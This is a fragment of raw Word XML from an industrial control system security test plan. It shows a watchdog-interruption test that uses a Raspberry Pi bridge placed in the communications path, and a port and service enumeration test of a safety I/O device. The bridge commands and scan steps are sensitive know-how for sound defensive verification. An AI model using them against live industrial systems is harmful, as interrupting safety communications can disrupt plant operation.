            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00034466">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> i.e., DoS resolves to a safe, not hazardous, state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w:rsidRPr="00316EA1" w14:paraId="5663D78D"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42C930F7" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43FDDA1E" w14:textId="77777777" w:rsidR="004C614C" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Reach OPERATE with a known F_WD_Time. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74BAAB2C" w14:textId="77777777" w:rsidR="008C0D3E" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Interrupt the safe-comms path for t &gt; F_WD_Time. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61476F96" w14:textId="77777777" w:rsidR="008C0D3E" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Measure time-to-safe-state; confirm outputs Low + qualifier bad. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79268907" w14:textId="38459A91" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Restore link; confirm no auto-restart without acknowledgment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC056D" w:rsidRPr="00316EA1" w14:paraId="7FE0AE1D"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512426" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D005767" w14:textId="77777777" w:rsidR="00473448" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if passivation occurs within the specified device acknowledgment/response time, outputs = Low, qualifier = bad, and re-integration is gated by acknowledgment. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2988CB01" w14:textId="11261364" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="0047344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3448">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL if outputs remain energized past F_WD_Time, or the device auto-re-integrates without acknowledgment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E2FE3CB" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3C3DDF" w14:textId="77777777" w:rsidR="00EC056D" w:rsidRPr="00EC056D" w:rsidRDefault="00EC056D" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C5914F" w14:textId="64AD7D10" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00EE3A78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concrete Execution</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle5dunkelAkzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="7737"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EE3A78" w14:paraId="266B3C95"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244775" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD62C39" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78"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EE3A78" w14:paraId="6E011D1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FFEA9B" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D82B47" w14:textId="3490EFAE" w:rsidR="00EE3A78" w:rsidRPr="002A51F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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ001-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="00316EA1" w14:paraId="2BD8F4FF"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3BC583BF" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD94A59" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78"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xml:space="preserve">In-path configuration: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A174BA8" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78"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xml:space="preserve">Pi bridges SPS↔SRIO (temporary re-cabling per Zone-B §10). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FEC006B" w14:textId="5705F1BA" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78"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F_WD_Time set e.g. 150 ms in GSD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="00316EA1" w14:paraId="2B464A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D3B923C" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E5438E" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux bridge utils on Pi; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6266FE61" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Wireshark (laptop) for timestamp correlation; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3165D918" w14:textId="475D53DC" w:rsidR="00EE3A78" w:rsidRPr="002A51F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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DO wired to PLC input for state readback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="00316EA1" w14:paraId="3D1B81E8"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42A9E552" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AD3A0DF" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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TC-RQ001-03 In-path watchdog interruption (&gt; F_WD_Time)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63CF52B7" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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sudo ip link add br0 type bridge</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A5302B" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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sudo ip link set eth0 master br0 # towards SPS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13359480" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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sudo ip link set eth2 master br0 # towards SRIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098EB2CB" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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sudo ip link set br0 up</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426DC361" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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 interrupt longer than F_WD_Time (150 ms) ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAB9261" w14:textId="4B4319C6" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78" w:rsidP="00EE3A7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sudo ip link set br0 down; sleep 1; sudo ip link set br0 up</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w14:paraId="6149155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5385FC" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1647F32F" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="002A51F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51F8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail-___</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE3A78" w:rsidRPr="00316EA1" w14:paraId="300D9A24"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4BC5489B" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7F4882" w14:textId="492C9AF0" w:rsidR="00EE3A78" w:rsidRPr="002A51F8" w:rsidRDefault="00EE3A78"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TC03_wd.pcapng with Δt cursor, DO=Low trace, FS-LED photo, PLC passivation/acknowledge log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA5F102" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="00EE3A78" w:rsidRDefault="00EE3A78" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FDB8FE" w14:textId="1D64073A" w:rsidR="00DB074F" w:rsidRPr="00FD6890" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AEBA9F" w14:textId="3D142505" w:rsidR="00DB074F" w:rsidRPr="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-04 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exposed-Service Enumeration on the COM/IoT Path</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="0071234B" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A3125" w14:textId="5FDB0423" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2">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AF57B2" w14:paraId="42704462"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F8C725" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EFCC721" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2"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AF57B2" w14:paraId="387432E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7FC4621" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="541B5AB8" w14:textId="0879EDE5" w:rsidR="00AF57B2" w:rsidRPr="00EC056D" w:rsidRDefault="00AF57B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B074F">
              <w:t>TC-RQ001-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w:rsidRPr="00EC056D" w14:paraId="212423C4" w14:textId="77777777" w:rsidTr="005C4FA9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD20E54" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="017C85C2" w14:textId="44C5C52B" w:rsidR="00AF57B2" w:rsidRPr="00EC056D"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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB074F">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>RQ-001 → CR 3.1 → Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w14:paraId="3E9F1D31"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27CEA34" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D317D43" w14:textId="28227BB5" w:rsidR="00AF57B2" w:rsidRPr="00EC056D" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Spoofing/Tampering </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w14:paraId="78B98ECE"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792FA935" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="347B4958" w14:textId="614FDBB6" w:rsidR="00AF57B2" w:rsidRPr="00EC056D"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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3 (Vulnerability Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w:rsidRPr="00316EA1" w14:paraId="12017D6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A86CE0" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3565808D" w14:textId="53A087DD" w:rsidR="00AF57B2" w:rsidRPr="00EC056D" w:rsidRDefault="00713EA3" w:rsidP="00AF57B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13EA3">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumerate the services a connecting device can reach on the non-safety path and compare against the approved matrix, evidencing that RQ-001's residual safety on that path relies on the firewall assumption (SRIO-9402</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w:rsidRPr="00316EA1" w14:paraId="54DC2278"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5E340DF0" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E8BE49B" w14:textId="77777777" w:rsidR="00AF57B2"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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Full TCP + top-UDP scan + service/version detection against the DUT; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F34D3D" w14:textId="77777777" w:rsidR="00AF57B2"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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">diff results vs. design; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E079B43" w14:textId="07CDF9C2" w:rsidR="00AF57B2" w:rsidRPr="00EC056D"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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>flag any unexpected open port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF57B2" w:rsidRPr="00316EA1" w14:paraId="0755FDF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233A3A" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC48421" w14:textId="77777777" w:rsidR="005F2CD8" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PASS if only design-approved services are exposed (e.g., IoT-Core HTTP; no HTTPS/MQTT/WebSocket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE64E47" w14:textId="5E046C88" w:rsidR="00AF57B2" w:rsidRPr="00EC056D" w:rsidRDefault="00AF57B2" w:rsidP="00AF57B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F57B2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL if any un-approved service is reachable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42CD4B42" w14:textId="77777777" w:rsidR="00AF57B2" w:rsidRPr="00AF57B2" w:rsidRDefault="00AF57B2" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC50AB4" w14:textId="139BD954" w:rsidR="00DB074F" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2">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DC4974" w14:paraId="011474EA"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25C1FF8" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
